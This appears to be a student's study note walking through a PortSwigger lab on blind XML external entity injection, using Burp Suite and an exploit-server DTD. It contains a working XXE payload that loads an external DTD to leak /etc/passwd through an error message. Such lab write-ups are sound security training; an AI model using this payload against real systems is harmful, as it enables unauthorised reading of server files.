TheWhiteFluid/Obsidian_Cyber/Obisdian_vault/WEB.PortSwigger/XEE - XML external entity injection.md

 1. Click "View exploit" and take a note of the URL for your malicious DTD.
 2. You need to exploit the stock checker feature by adding a parameter entity referring to the malicious DTD.
 First, visit a product page, click "Check stock", and intercept the resulting POST request in Burp Suite.
 3. Insert the following external entity definition in between the XML declaration and the `stockCheck` element:
     `<!DOCTYPE test [<!ENTITY % loadDTD SYSTEM "YOUR-DTD-URL"> %loadDTD;]>`

-    You should see an error message containing the contents of the `/etc/passwd` file.

 Analysis:
 - out of band XXE using a DTD exploit file
     `<!DOCTYPE test [<!ENTITY % loadDtd SYSTEM "YOUR-DTD-URL(server/exploit)"> %loadDtd;]>`